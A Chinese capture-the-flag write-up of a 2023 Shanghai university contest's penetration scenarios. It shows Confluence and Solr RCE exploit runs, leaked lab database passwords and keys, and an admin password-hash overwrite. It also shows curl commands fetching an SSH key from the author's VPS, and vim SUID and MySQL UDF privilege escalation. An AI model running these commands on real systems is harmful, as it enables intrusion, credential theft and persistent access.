原创 | 2023年第八届上海市大学生网络安全大赛 / 磐石行动 漏洞挖掘 Workthrough(下)
引言
第八届上海市大学生网络安全大赛
暨“磐石行动”2023(首届)大学生网络安全邀请赛
—— CTF比赛
2023.5.20 9:00 - 21:00
—— 漏洞挖掘比赛
2023.5.21 00:00 - 2023.5.22 24:00
由于文章写得有点长,干脆拆分成了上下篇,上篇主要写了下场景1和场景3的
那这个下篇接着来记录一下场景2和场景4的漏洞挖掘过程。
既然是Workthrough,那文中必然有不少走错路的时候,说不定还有写得不对的地方,师傅们看的时候就当听故事好了(哈哈)
漏洞挖掘场景2【1/4】
(icmp) Target 10.103.252.84 is alive
[*] Icmp alive hosts len is: 1
10.103.252.84:22 open
10.103.252.84:3306 open
10.103.252.84:8090 open
[*] alive ports len is: 3
重新扫
(icmp) Target 10.103.187.168 is alive
[*] Icmp alive hosts len is: 1
10.103.187.168:22 open
10.103.187.168:3306 open
10.103.187.168:8090 open
10.103.187.168:8091 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://10.103.187.168:8091 code:204 len:0 title:None
[*] WebTitle: http://10.103.187.168:8090 code:302 len:0 title:None 跳转url: http://10.103.187.168:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
[*] WebTitle: http://10.103.187.168:8090/login.action?os_destination=%2Findex.action&permissionViolation=true code:200 len:33317 title:登录 - Confluence
[+] InfoScan:http://10.103.187.168:8090/login.action?os_destination=%2Findex.action&permissionViolation=true [ATLASSIAN-Confluence]
http://10.103.252.84/
http://10.103.252.84:8090/
基于 Atlassian Confluence 7.14.2 技术构建
CVE-2022-26134 Confluence OGNL RCE 漏洞分析
https://www.anquanke.com/post/id/274026
天下大木头师傅的 Confluence CVE-2022-26134 漏洞分析
http://wjlshare.com/archives/1755
Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability
https://github.com/nxtexploit/CVE-2022-26134
$ python CVE-2022-26134.py http://10.103.252.84:8090/ id
Confluence target version: [1;94m7.14.2[1;m
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
$ uname -a
Linux localhost 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
NAME="CentOS Linux" VERSION="7 (Core)" ID="centos" ID_LIKE="rhel fedora" VERSION_ID="7" PRETTY_NAME="CentOS Linux 7 (Core)" ANSI_COLOR="0;31" CPE_NAME="cpe:/o:centos:centos:7" HOME_URL="https://www.centos.org/" BUG_REPORT_URL="https://bugs.centos.org/" CENTOS_MANTISBT_PROJECT="CentOS-7" CENTOS_MANTISBT_PROJECT_VERSION="7" REDHAT_SUPPORT_PRODUCT="centos" REDHAT_SUPPORT_PRODUCT_VERSION="7"
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:995::/var/lib/chrony:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false confluence:x:1001:1001:Atlassian Confluence:/home/confluence:/bin/bash
$ ls /
bin boot dev etc home lib lib64 media mnt network.ini opt proc root run sbin srv sys tmp usr var
$ pwd
/opt/atlassian/confluence/bin
$ ls
bootstrap.jar catalina.bat catalina.sh catalina-tasks.xml ciphers.bat ciphers.sh commons-daemon.jar configtest.bat configtest.sh confluence-context-path-extractor.jar daemon.sh digest.bat digest.sh display-help.bat display-help.sh install_linux_service.sh makebase.bat makebase.sh OS X - Run Confluence In Background.command OS X - Run Confluence In Terminal Window.command OS X - Stop Confluence.command service.bat setclasspath.bat setclasspath.sh setenv.bat setenv.sh setjre.bat setjre.sh setup_user.sh shutdown.bat shutdown.sh start-confluence.bat start-confluence.sh startup.bat startup.sh stop-confluence.bat stop-confluence.sh synchrony synchrony-proxy-watchdog.jar tcnative-1.dll tomcat9.exe tomcat9w.exe tomcat-juli.jar tool-wrapper.bat tool-wrapper.sh update-acl-for-custom-confluence-folder.bat user.sh version.bat version.sh
$ env
OLDPWD=/opt/atlassian/confluence JDK_JAVA_OPTIONS= --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED JAVA_OPTS=-javaagent:/opt/atlassian/atlassian-agent-v1.3.1/atlassian-agent.jar -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 JRE_HOME=/opt/atlassian/confluence/jre/ START_CONFLUENCE_JAVA_OPTS=-Datlassian.plugins.startup.options='' PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin PWD=/opt/atlassian/confluence/bin LANG=en_US.UTF-8 CATALINA_OPTS=-Datlassian.plugins.startup.options='' -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,CLDR -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2023-05-20_21-14-22.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc-2023-05-20_21-14-22.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m CONFLUENCE_CONTEXT_PATH= CONF_USER=confluence SHLVL=4 CATALINA_PID=/opt/atlassian/confluence/work/catalina.pid _=/opt/atlassian/confluence/jre//bin/java HOME=
flag在/root/目录下,当前用户权限,找个地方提权,mysql?
数据库的配置文件
$ python CVE-2022-26134.py http://10.103.252.84:8090/ "cat /var/atlassian/application-data/confluence/confluence.cfg.xml"
Confluence target version: [1;94m7.14.2[1;m
<?xml version="1.0" encoding="UTF-8"?> <confluence-configuration> <setupStep>complete</setupStep> <setupType>custom</setupType> <buildNumber>8803</buildNumber> <properties> <property name="admin.ui.allow.daily.backup.custom.location">false</property> <property name="admin.ui.allow.manual.backup.download">false</property> <property name="admin.ui.allow.site.support.email">false</property> <property name="atlassian.license.message">AAABLA0ODAoPeJxtkFtLwzAUgN/zKwI+Z6ytRRQCZm0Y0zYdttv0MatnGsiykktx/97s9iLCeTm3j ++cuy4AZoPFaY6T/CnJYuCi7XA6TTNUguutGrw6GFoczE4HMD0gEfZbsM1u5cA6ShJUWJCnoVJ6o KdNMr0naY7ijpe9F3IP1IPzCeojZRJLaowVG+A2wmupNFVmVE5tNTy7HgxMjEZ8lDqc4XQntYMLo VKx76A7DnCGF01d87diwSoUQcaDkVGU/wzKHi9SWfZAkvQkdQbcTih0cB6sOHyCo1PUckE/mhWu2 SvHNccMt6zESyZKNkGN/ZJGuYuMEmvVqlnFccdZjVqwI9hFSWfzJifzuViR5PF9QzYv7RpdbWO3W pS37H+5ZbD9t3Tw55O/GO2IwTAsAhRUWCE6ipB5qHBRf+XtHnqnX1gdHgIUFvOiPKmn4ZhUVuqgO F6E9COcGh8=X02f3</property> <property name="attachments.dir">${confluenceHome}/attachments</property> <property name="confluence.setup.locale">zh_CN</property> <property name="confluence.setup.server.id">BGO5-GGNU-19XW-WJSV</property> <property name="confluence.webapp.context.path"></property> <property name="finalizedBuildNumber">8803</property> <property name="hibernate.c3p0.validate">true</property> <property name="hibernate.connection.autocommit">false</property> <property name="hibernate.connection.driver_class">com.mysql.jdbc.Driver</property> <property name="hibernate.connection.isolation">2</property> <property name="hibernate.connection.password">Confluence.123</property> <property name="hibernate.connection.provider_class">com.atlassian.confluence.impl.hibernate.DelegatingHikariConnectionProvider</property> <property name="hibernate.connection.url">jdbc:mysql://localhost/confluence?sessionVariables=tx_isolation='READ-COMMITTED'</property> <property name="hibernate.connection.username">confluence</property> <property name="hibernate.database.lower_non_ascii_supported">true</property> <property name="hibernate.dialect">com.atlassian.confluence.impl.hibernate.dialect.MySQLDialect</property> <property name="hibernate.hikari.idleTimeout">30000</property> <property name="hibernate.hikari.maximumPoolSize">60</property> <property name="hibernate.hikari.minimumIdle">20</property> <property name="hibernate.hikari.registerMbeans">true</property> <property name="hibernate.setup">true</property> <property name="jwt.private.key">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</property> <property name="jwt.public.key">MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAwPN47Iz3qCt2p045u43/4rGwccTPfuJ/u6JAfTQ+9TjtJskRUAwZmEnhqhtfNDcoAUzv0TXfxlrfbznJb1caNoG4uPlXZg6WA9HAqxeEwTf4QWO434QX/DYRBsoeQI0qhqYRTAgUV7vLZzaMa9VRyj2VWVwu8gRWEvcA1UA+uPiel7IlBe2xazY9ZFnB3SsR1FdZxasgEb6EW8iBN9ZBozVt0RwlA+Bdn5MpzQoYPq+7avL1Dh5X1uuW3K1ADFG1CPa0hJ7DrtaNYGmeWTuAOXrjQNiYevtduLZ0rPZPT6rwAD6aCmu6VvVKU5FL2aeoOidEack7BKKFaiDaGMP4OasDpPKYl49tWuIwbqw+xizhzu5uuBKTkhE3Vjm6zRgsG9u6wtbmm7h5BUgzoi91MvLdx/4JuhrFGr0hXnGvtimymbiqcRO+AKWaJVgns1AbkPEgC5OoJmEtl8NFT4bIn/1hW4AXOT64u0sR9thhcWAybN9ZUV4NkCa+fNLd5c0NAgMBAAE=</property> <property name="lucene.index.dir">${localHome}/index</property> <property name="spring.datasource.hikari.registerMbeans">true</property> <property name="synchrony.encryption.disabled">true</property> <property name="synchrony.proxy.enabled">true</property> <property name="webwork.multipart.saveDir">${localHome}/temp</property> </properties> </confluence-configuration>
数据库 3306
confluence
Confluence.123
5.7.42
好像是 mysql 权限,也没 root
还得提权?参考 confluence 忘记密码
https://www.jianshu.com/p/7cc8ea59578a
cwd_user 表
admin
{PKCS5S2}zpwacMtAM1bWGcw8W+dVDjt2BFP3BwDXzYcvM6yXYatgXmWq+aOtOQ+GrgFc5FYw
select u.id, u.user_name, u.active from cwd_user u
join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id
where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';
458753
update cwd_user set credential =
'{PKCS5S2}ltrb9LlmZ0QDCJvktxd45WgYLOgPt2XTV8X7av2p0mhPvIwofs9bHYVz2OXQ6/kF'
where id=458753;
修改密码为 Ab123456,登录
还得提权?
shell 弹不回来好难受,只能正向打啊啊啊
可以弹公网
但是不如直接写私钥然后 ssh 登录
python CVE-2022-26134.py http://10.103.187.168:8090/ "mkdir /home/confluence/.ssh/"
python CVE-2022-26134.py http://10.103.187.168:8090/ "curl vpsip:port/authorized_keys -o /home/confluence/.ssh/authorized_keys"
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23
看看sudo提权或者CVE-2021-4034 pwnkit那个
看起来都不行
入口 flag1 192.168.0.12
vim 有 suid 权限
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
sh-4.2# cat /root/flag
flag{dST7HmECAWgnrv6jDP9Yex18O2QGiVa0}sh-4.2#
sh-4.2# cat /root/提示.txt
管理员留下这些字符串也不知道做什么用
192.168.0.55
2W2mg^v6B6UJNR@Svs
内网
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450
inet 10.103.187.168 netmask 255.255.0.0 broadcast 10.103.255.255
inet6 fe80::5054:7fff:fe39:dae6 prefixlen 64 scopeid 0x20<link>
ether 52:54:7f:39:da:e6 txqueuelen 1000 (Ethernet)
RX packets 240175 bytes 22037866 (21.0 MiB)
RX errors 0 dropped 331 overruns 0 frame 0
TX packets 29026 bytes 5772108 (5.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450
inet 192.168.0.12 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::5054:53ff:fe6e:8ffc prefixlen 64 scopeid 0x20<link>
ether 52:54:53:6e:8f:fc txqueuelen 1000 (Ethernet)
RX packets 70 bytes 8372 (8.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7 bytes 586 (586.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 393857 bytes 49735606 (47.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 393857 bytes 49735606 (47.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(icmp) Target 192.168.0.12 is alive
(icmp) Target 192.168.0.33 is alive
(icmp) Target 192.168.0.55 is alive
[*] Icmp alive hosts len is: 3
192.168.0.33:6379 open
192.168.0.55:3306 open
192.168.0.12:3306 open
192.168.0.55:445 open
192.168.0.55:139 open
192.168.0.55:135 open
192.168.0.33:22 open
192.168.0.12:8091 open
192.168.0.12:8090 open
192.168.0.12:22 open
[*] alive ports len is: 10
start vulscan
[*] NetBios: 192.168.0.55 WORKGROUP\WIN-FGHCOKNHM7P Windows Server 2016 Datacenter 14393
[*] WebTitle: http://192.168.0.12:8091 code:204 len:0 title:None
[*] WebTitle: http://192.168.0.12:8090 code:302 len:0 title:None 跳转url: http://192.168.0.12:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
[*] WebTitle: http://192.168.0.12:8090/login.action?os_destination=%2Findex.action&permissionViolation=true code:200 len:33317 title:登录 - Confluence
[+] InfoScan:http://192.168.0.12:8090/login.action?os_destination=%2Findex.action&permissionViolation=true [ATLASSIAN-Confluence]
192.168.0.55 win
2W2mg^v6B6UJNR@Svs
用上面的连接信息连
3389 是不是没开不让连啊。。
是不是哪里锅了
噢,还有 3306 啊
MySQL 5.5.53
直接 udf 提权
-- select @@basedir;
-- C:/Program Files/MySQL/MySQL Server 5.5/
SELECT 0x4d5a90000300000004000000ffff0000...0000000000 INTO DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.5\\lib\\plugin\\udf.dll';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
select sys_eval('whoami');
系统权限好啊!
C
A696-C4FC
C:\Users ¼
2023/03/24 15:05 <DIR> .
2023/03/24 15:05 <DIR> ..
2023/05/05 14:40 <DIR> Administrator
2018/02/03 08:23 <DIR> Public
0 0
4 ¼ 126,700,122,112
C
A696-C4FC
C:\Users\Administrator\Desktop ¼
2023/05/10 22:18 <DIR> .
2023/05/10 22:18 <DIR> ..
2023/05/05 14:39 1,190 RedisDesktopManager.lnk
1 1,190
2 ¼ 126,700,122,112
Windows IP
2:
DNS . . . . . . . :
IPv6 . . . . . . . . : fe80::2caf:f7d7:cd87:c5dc%5
IPv4 . . . . . . . . . . . . : 192.168.0.55
. . . . . . . . . . . . : 255.255.255.0
. . . . . . . . . . . . . :
Reusable ISATAP Interface {1798E6ED-B1D3-4DA3-A24B-2CE5D2862706}:
. . . . . . . . . . . . :
DNS . . . . . . . :
\\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
: 192.168.0.55 --- 0x5
Internet
192.168.0.12 52-54-53-6e-8f-fc
192.168.0.255 ff-ff-ff-ff-ff-ff
224.0.0.22 01-00-5e-00-00-16
224.0.0.252 01-00-5e-00-00-fc
239.255.255.250 01-00-5e-7f-ff-fa
255.255.255.255 ff-ff-ff-ff-ff-ff
PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 708
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1800
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 828
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 440
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 964
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 836
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 836
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 1620
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 560
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 1512
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 568
TCP 192.168.0.55:139 0.0.0.0:0 LISTENING 4
TCP 192.168.0.55:3306 192.168.0.12:43636 ESTABLISHED 1800
TCP 192.168.0.55:3306 192.168.0.12:43702 ESTABLISHED 1800
TCP 192.168.0.55:3306 192.168.0.12:43798 ESTABLISHED 1800
TCP [::]:135 [::]:0 LISTENING 708
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3389 [::]:0 LISTENING 828
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 440
TCP [::]:49665 [::]:0 LISTENING 964
TCP [::]:49666 [::]:0 LISTENING 836
TCP [::]:49667 [::]:0 LISTENING 836
TCP [::]:49668 [::]:0 LISTENING 1620
TCP [::]:49669 [::]:0 LISTENING 560
TCP [::]:49670 [::]:0 LISTENING 1512
TCP [::]:49671 [::]:0 LISTENING 568
UDP 0.0.0.0:123 *:* 320
UDP 0.0.0.0:500 *:* 836
UDP 0.0.0.0:3389 *:* 828
UDP 0.0.0.0:4500 *:* 836
UDP 0.0.0.0:5050 *:* 320
UDP 0.0.0.0:5353 *:* 1032
UDP 0.0.0.0:5355 *:* 1032
UDP 127.0.0.1:1900 *:* 3200
UDP 127.0.0.1:49704 *:* 3200
UDP 192.168.0.55:137 *:* 4
UDP 192.168.0.55:138 *:* 4
UDP 192.168.0.55:1900 *:* 3200
UDP 192.168.0.55:49703 *:* 3200
UDP [::]:123 *:* 320
UDP [::]:500 *:* 836
UDP [::]:3389 *:* 828
UDP [::]:4500 *:* 836
UDP [::]:5353 *:* 1032
UDP [::]:5355 *:* 1032
UDP [::1]:1900 *:* 3200
UDP [::1]:49702 *:* 3200
UDP [fe80::2caf:f7d7:cd87:c5dc%5]:1900 *:* 3200
UDP [fe80::2caf:f7d7:cd87:c5dc%5]:49701 *:* 3200
PID #
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 4 K
System 4 Services 0 132 K
smss.exe 268 Services 0 1,072 K
csrss.exe 360 Services 0 4,068 K
csrss.exe 432 Console 1 3,688 K
wininit.exe 440 Services 0 5,048 K
winlogon.exe 492 Console 1 13,128 K
services.exe 560 Services 0 6,868 K
lsass.exe 568 Services 0 13,480 K
svchost.exe 652 Services 0 13,160 K
svchost.exe 708 Services 0 8,000 K
dwm.exe 820 Console 1 29,492 K
svchost.exe 828 Services 0 13,256 K
svchost.exe 836 Services 0 43,116 K
svchost.exe 908 Services 0 17,144 K
svchost.exe 964 Services 0 13,080 K
svchost.exe 320 Services 0 15,656 K
svchost.exe 628 Services 0 15,600 K
svchost.exe 1032 Services 0 19,308 K
svchost.exe 1040 Services 0 6,952 K
svchost.exe 1512 Services 0 6,660 K
spoolsv.exe 1620 Services 0 15,552 K
svchost.exe 1672 Services 0 19,412 K
dllhost.exe 1748 Services 0 7,576 K
mysqld.exe 1800 Services 0 31,636 K
svchost.exe 1848 Services 0 7,956 K
MsMpEng.exe 1900 Services 0 167,532 K
qemu-ga.exe 1916 Services 0 8,544 K
dllhost.exe 2044 Services 0 12,448 K
msdtc.exe 2184 Services 0 9,632 K
LogonUI.exe 2580 Console 1 41,408 K
svchost.exe 3200 Services 0 6,564 K
cmd.exe 2420 Services 0 2,756 K
conhost.exe 2292 Services 0 7,020 K
tasklist.exe 2800 Services 0 7,756 K
WmiPrvSE.exe 3756 Services 0 8,464 K
mimikatz 被杀了。。
MsMpEng.exe <=> Microsoft Security Essentials
直接加个账号连上去,然后关掉 win defender,然后 dump
啥也没有啊
不过Administrator的桌面上有个Redis客户端,估计连的是192.168.0.33:6379这个
感觉这台机器上哪里存了密码
赛后看了其他队wp发现要解本机的NTLM hash然后拿去cmd5解密得到明文密码,用这个密码就能登录redis然后进一步弹shell
好吧,摸了
漏洞挖掘场景4【2/3】
10.103.31.38:22 open
10.103.31.38:8983 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle:http://10.103.31.38:8983 code:302 len:0 title:None 跳转url: http://10.103.31.38:8983/solr/
[*] WebTitle:http://10.103.31.38:8983/solr/ code:200 len:14543 title:Solr Admin
[+] http://10.103.31.38:8983 poc-yaml-solr-cve-2019-0193
[+] http://10.103.31.38:8983 poc-yaml-solr-velocity-template-rce
flag1 192.168.33.39 apache_solr
https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template/tree/master
$ python apache_solr_exec.py 10.103.31.38 8983
OS Realese: Linux, OS Version: 3.10.0-1160.80.1.el7.x86_64
if remote exec failed, you should change your command with right os platform
Init node test1 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test1
root
Init node test2 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test2
root
Init node test3 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test3
root
Init node test4 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test4
root
Init node test5 Successfully, exec command=whoami
RCE Successfully @Apache Solr node test5
root
# ls -al /root
RCE Successfully @Apache Solr node test1
total 52
dr-xr-x---. 4 root root 216 May 20 23:25 .
dr-xr-xr-x. 17 root root 263 May 20 23:25 ..
-rw-------. 1 root root 6880 Nov 11 2022 anaconda-ks.cfg
-rw------- 1 root root 76 May 12 06:40 .bash_history
-rw-r--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rw-r--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rw-r--r--. 1 root root 176 Dec 29 2013 .bashrc
-rw-r--r--. 1 root root 100 Dec 29 2013 .cshrc
-rw-r--r-- 1 root root 38 May 20 23:25 flag
-rw-------. 1 root root 6587 Nov 11 2022 original-ks.cfg
drwxr-xr-x 9 root root 201 May 4 09:02 solr-7.7.2
drwx------. 2 root root 29 Apr 12 10:03 .ssh
-rw-r--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rw------- 1 root root 4836 May 7 05:52 .viminfo
# cat /root/flag
flag{hPucBnCtxSl38JG4orYW2a5diqUpejH7}
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:6d:2a:35:d8 brd ff:ff:ff:ff:ff:ff
inet 10.103.32.51/16 brd 10.103.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::5054:6dff:fe2a:35d8/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:5d:70:af:3f brd ff:ff:ff:ff:ff:ff
inet 192.168.33.39/24 brd 192.168.33.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::5054:5dff:fe70:af3f/64 scope link
valid_lft forever preferred_lft forever
# ip r
default via 10.103.0.1 dev eth0
10.103.0.0/16 dev eth0 proto kernel scope link src 10.103.32.51
192.168.33.0/24 dev eth1 proto kernel scope link src 192.168.33.39
python apache_solr_exec.py 10.103.32.51 8983 "curl vpsip:port/authorized_keys -o /root/.ssh/authorized_keys"
直接加个 key 然后 ssh 上去
内网 192.168.33
扫内网
(icmp) Target 192.168.33.39 is alive
(icmp) Target 192.168.33.5 is alive
(icmp) Target 192.168.33.170 is alive
